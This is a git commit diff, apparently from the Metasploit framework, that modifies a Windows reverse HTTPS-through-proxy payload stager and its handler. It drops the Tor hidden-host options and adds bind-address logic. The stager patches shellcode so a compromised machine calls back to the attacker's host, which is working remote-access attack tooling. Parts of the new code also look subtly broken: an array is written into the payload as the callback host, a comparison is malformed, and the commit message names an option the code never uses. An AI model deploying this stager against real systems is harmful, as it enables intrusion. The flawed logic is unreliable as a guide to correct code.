Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was ommitted in the orginal commits. This now uses the same mechanism as the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00 · 2013-11-11 22:21:05 +10:00 · 063da8a22e
parent 12810580d6
commit 063da8a22e
2 changed files with 36 additions and 12 deletions
--- a/lib/msf/core/handler/reverse_https_proxy.rb
+++ b/lib/msf/core/handler/reverse_https_proxy.rb
@ -42,13 +42,17 @@ module ReverseHttpsProxy
        OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
        OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
        OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
-        OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
-        OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
        OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
        OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
        OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
 			], Msf::Handler::ReverseHttpsProxy)

+    register_advanced_options(
+      [
+        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
+      ], Msf::Handler::ReverseHttpsProxy)
+
  end

 end
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@ -134,11 +134,7 @@ module Metasploit3
    p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")

    # patch the LPORT
-    unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
-      lport = datastore['HIDDENPORT']
-    else
-      lport = datastore['LPORT']
-    end
+    lport = bind_port

    lportloc = p.index("\x68\x5c\x11\x00\x00")  # PUSH DWORD 4444
    p[lportloc+1] = [lport.to_i].pack('V')[0]
@ -148,11 +144,7 @@ module Metasploit3

    # append LHOST and return payload

-    unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
-      lhost = datastore['HIDDENHOST']
-    else
-      lhost = datastore['LHOST']
-    end
+    lhost = bind_address
    p + lhost.to_s + "\x00"

  end
@ -163,5 +155,33 @@ module Metasploit3
  def wfs_delay
    20
  end
+
+protected
+
+  def bind_port
+    port = datastore['ReverseListenerBindPort'].to_i
+    port > 0 ? port : datastore['LPORT'].to_i
+  end
+
+  def bind_address
+    # Switch to IPv6 ANY address if the LHOST is also IPv6
+    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+    # First attempt to bind LHOST. If that fails, the user probably has
+    # something else listening on that interface. Try again with ANY_ADDR.
+    any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+    addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+    if not datastore['ReverseListenerBindAddress'].to_s.empty?
+      # Only try to bind to this specific interface
+      addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+      # Pick the right "any" address if either wildcard is used
+      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+    end
+
+    addrs
+  end
+
 end